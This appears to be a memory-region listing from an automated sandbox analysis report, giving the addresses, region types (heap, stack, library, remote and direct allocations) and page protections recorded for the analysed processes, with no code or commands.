page read and write
1F198060000
remote allocation
page read and write
29558160000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
A1C76F9000
stack
page read and write
7FFA52482000
unkown
page readonly
1A5B477F000
heap
page read and write
1AFF9560000
trusted library allocation
page read and write
24E0D302000
heap
page read and write
27EE41B1000
heap
page read and write
1AFF90A6000
heap
page read and write
1AFF94F0000
trusted library allocation
page read and write
1AFF92B0000
trusted library allocation
page read and write
166DC45F000
heap
page read and write
1AFE1FB2000
trusted library allocation
page read and write
7FF9F1A7D000
trusted library allocation
page execute and read and write
27EE4602000
heap
page read and write
193F24E000
stack
page read and write
24D1DC29000
heap
page read and write
1AFE1B73000
trusted library allocation
page read and write
63D000
heap
page read and write
7FF9F1C12000
trusted library allocation
page read and write
7FF9F1B56000
trusted library allocation
page execute and read and write
1AFE1D45000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFF92A9000
trusted library allocation
page read and write
1F197D21000
trusted library allocation
page read and write
24D1DB80000
trusted library allocation
page read and write
1AFF92C1000
trusted library allocation
page read and write
27EE4186000
heap
page read and write
29558340000
trusted library allocation
page read and write
24D1DC5F000
heap
page read and write
166DC500000
heap
page read and write
62F000
heap
page read and write
24D1DC3A000
heap
page read and write
1A5B45E0000
heap
page read and write
295591F0000
heap
page readonly
1AFF9550000
trusted library allocation
page read and write
24D1DD13000
heap
page read and write
1AFDEFCC000
heap
page read and write
1F198060000
remote allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
1A5B476E000
heap
page read and write
29558290000
heap
page read and write
1AFF94F0000
trusted library allocation
page read and write
10017E000
stack
page read and write
1AFF9170000
trusted library allocation
page read and write
1F193B60000
trusted library allocation
page read and write
1F197F06000
heap
page read and write
63D000
heap
page read and write
1AFE1AFA000
trusted library allocation
page read and write
1A5B4751000
heap
page read and write
27EE417D000
heap
page read and write
24D1DAF0000
heap
page read and write
26E0000
heap
page read and write
1AFF92B0000
trusted library allocation
page read and write
22C9BD10000
heap
page read and write
193F40E000
stack
page read and write
1F197E60000
trusted library allocation
page read and write
9DD35FF000
stack
page read and write
295583CF000
heap
page read and write
255B000
stack
page read and write
27EE4100000
heap
page read and write
1AFF95A0000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
1F1925A0000
trusted library section
page read and write
1AFF92A8000
trusted library allocation
page read and write
1A5B4756000
heap
page read and write
27EE363C000
heap
page read and write
27EE3681000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
1F198030000
trusted library allocation
page read and write
1F197D00000
trusted library allocation
page read and write
5EF1E7F000
stack
page read and write
7FFA52460000
unkown
page readonly
193F50C000
stack
page read and write
7FF9F1B90000
trusted library allocation
page execute and read and write
1AFF94E0000
trusted library allocation
page read and write
24E0D130000
heap
page read and write
1AFE1AD8000
trusted library allocation
page read and write
5F0000
remote allocation
page read and write
2070000
remote allocation
page read and write
1F19268C000
heap
page read and write
193DE95000
stack
page read and write
AF160FE000
stack
page read and write
9DD347F000
stack
page read and write
1AFE1BA5000
trusted library allocation
page read and write
7FF9F1A74000
trusted library allocation
page read and write
7FF9F1B2C000
trusted library allocation
page execute and read and write
1AFF92B0000
trusted library allocation
page read and write
1AFF9170000
trusted library allocation
page read and write
1AFF92B0000
trusted library allocation
page read and write
1009FF000
stack
page read and write
D1D2FFE000
stack
page read and write
7FF9F1CD0000
trusted library allocation
page read and write
27EE4600000
heap
page read and write
1005FB000
stack
page read and write
55634DA000
stack
page read and write
9DD2C7B000
stack
page read and write
1AFDF1D0000
trusted library allocation
page read and write
1AFDF200000
heap
page readonly
1A5B4756000
heap
page read and write
1AFF0EE1000
trusted library allocation
page read and write
27EE3530000
heap
page read and write
7FF9F1DC0000
trusted library allocation
page read and write
1AFF9160000
trusted library allocation
page read and write
8F0000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
27EE3713000
heap
page read and write
166DC400000
heap
page read and write
9DD37FD000
stack
page read and write
1AFE1D12000
trusted library allocation
page read and write
7FF9F1DB0000
trusted library allocation
page read and write
27EE418B000
heap
page read and write
1AFF9197000
heap
page execute and read and write
1AFF9170000
trusted library allocation
page read and write
24D1DC5D000
heap
page read and write
1F197B70000
trusted library allocation
page read and write
1F197E00000
heap
page read and write
7FF9F1B30000
trusted library allocation
page execute and read and write
1AFF92B0000
trusted library allocation
page read and write
27EE3629000
heap
page read and write
193E5FC000
stack
page read and write
1F192600000
heap
page read and write
1F1936E0000
trusted library allocation
page read and write
27EE3560000
trusted library allocation
page read and write
A1C757A000
stack
page read and write
27EE4185000
heap
page read and write
7FF9F1CE0000
trusted library allocation
page read and write
27EE418B000
heap
page read and write
1A5B4760000
heap
page read and write
1F192676000
heap
page read and write
510000
heap
page read and write
1AFDF240000
heap
page execute and read and write
7FF9F1D80000
trusted library allocation
page read and write
1AFDF084000
heap
page read and write
24E0D250000
heap
page read and write
62F000
heap
page read and write
520000
heap
page read and write
1F197EDF000
heap
page read and write
A1C75F9000
stack
page read and write
AF1667A000
stack
page read and write
9DD357F000
stack
page read and write
1AFDEFED000
heap
page read and write
1AFF9150000
trusted library allocation
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFDEFD3000
heap
page read and write
27EE36C7000
heap
page read and write
1AFE1FC3000
trusted library allocation
page read and write
27EE4189000
heap
page read and write
27EE4603000
heap
page read and write
1A5B48C0000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFF92C0000
trusted library allocation
page read and write
1AFF9302000
heap
page read and write
1F197E56000
heap
page read and write
27EE4602000
heap
page read and write
27EE4189000
heap
page read and write
27EE41AC000
heap
page read and write
1AFF95AE000
trusted library allocation
page read and write
24E0D140000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
1AFF90A2000
heap
page read and write
27EE4152000
heap
page read and write
1A5B4740000
heap
page read and write
1AFF92A0000
trusted library allocation
page read and write
166DCC02000
trusted library allocation
page read and write
27EE4127000
heap
page read and write
24E0D300000
heap
page read and write
22C9BF13000
heap
page read and write
27EE36ED000
heap
page read and write
166DC220000
heap
page read and write
24D1DD00000
heap
page read and write
1AFF92B0000
trusted library allocation
page read and write
1AFF92C0000
trusted library allocation
page read and write
1AFF9500000
trusted library allocation
page read and write
A1C767E000
stack
page read and write
1AFDEF70000
heap
page read and write
1AFF92A1000
trusted library allocation
page read and write
9E5000
heap
page read and write
7FF9F1DE0000
trusted library allocation
page read and write
1AFF9170000
trusted library allocation
page read and write
1F192702000
heap
page read and write
1AFF92E0000
heap
page read and write
1AFDF040000
heap
page read and write
180000000
direct allocation
page read and write
AF162F7000
stack
page read and write
1AFF92A0000
trusted library allocation
page read and write
9DD33FB000
stack
page read and write
1AFDEFD1000
heap
page read and write
2090000
heap
page read and write
1F1926AD000
heap
page read and write
27EE36AB000
heap
page read and write
7FF9F1CA9000
trusted library allocation
page read and write
1AFDF015000
heap
page read and write
D1D29BF000
stack
page read and write
29558370000
trusted library allocation
page read and write
1AFF92B0000
trusted library allocation
page read and write
1FA000
stack
page read and write
234E000
stack
page read and write
1AFF9170000
trusted library allocation
page read and write
5EF22FE000
stack
page read and write
1007FE000
stack
page read and write
24D1DC13000
heap
page read and write
24E0D213000
heap
page read and write
1AFF9530000
trusted library allocation
page read and write
24E0D229000
heap
page read and write
27EE419D000
heap
page read and write
24E0D28B000
heap
page read and write
570000
direct allocation
page execute and read and write
9DD2E77000
stack
page read and write
1AFF92C0000
trusted library allocation
page read and write
1AFF9170000
trusted library allocation
page read and write
27EE417F000
heap
page read and write
193DF1F000
stack
page read and write
1AFF90D3000
heap
page read and write
1AFF9590000
trusted library allocation
page read and write
1AFE1FBA000
trusted library allocation
page read and write
27EE411E000
heap
page read and write
1AFDF285000
heap
page read and write
1AFF92D0000
trusted library allocation
page read and write
26DF000
stack
page read and write
1AFF92A0000
trusted library allocation
page read and write
18002E000
direct allocation
page readonly
1AFE1B45000
trusted library allocation
page read and write
1F197D0E000
trusted library allocation
page read and write
1AFF92B0000
trusted library allocation
page read and write
60D000
heap
page read and write
1F192FF3000
trusted library allocation
page read and write
7FF9F1D20000
trusted library allocation
page read and write
55635DF000
stack
page read and write
1AFE1AED000
trusted library allocation
page read and write
193E27F000
stack
page read and write
9DD38FA000
stack
page read and write
24E0DC02000
trusted library allocation
page read and write
D1D2CFB000
stack
page read and write
1F192713000
heap
page read and write
22C9BDA0000
trusted library allocation
page read and write
7FF9F1C16000
trusted library allocation
page read and write
27EE41AD000
heap
page read and write
24E0D24D000
heap
page read and write
1AFF9170000
trusted library allocation
page read and write
1F197E20000
heap
page read and write
295582F9000
heap
page read and write
24D1DC73000
heap
page read and write
1F197B60000
trusted library allocation
page read and write
1004FB000
stack
page read and write
F9FD87B000
stack
page read and write
1F197EA9000
heap
page read and write
22C9C802000
trusted library allocation
page read and write
D1D30FF000
stack
page read and write
1AFF9190000
heap
page execute and read and write
AF163F7000
stack
page read and write
There are 786 hidden memdumps, click here to show them.